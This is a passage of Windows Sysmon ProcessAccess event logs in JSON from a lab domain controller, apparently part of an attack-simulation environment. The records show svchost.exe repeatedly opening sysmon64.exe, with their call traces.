C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 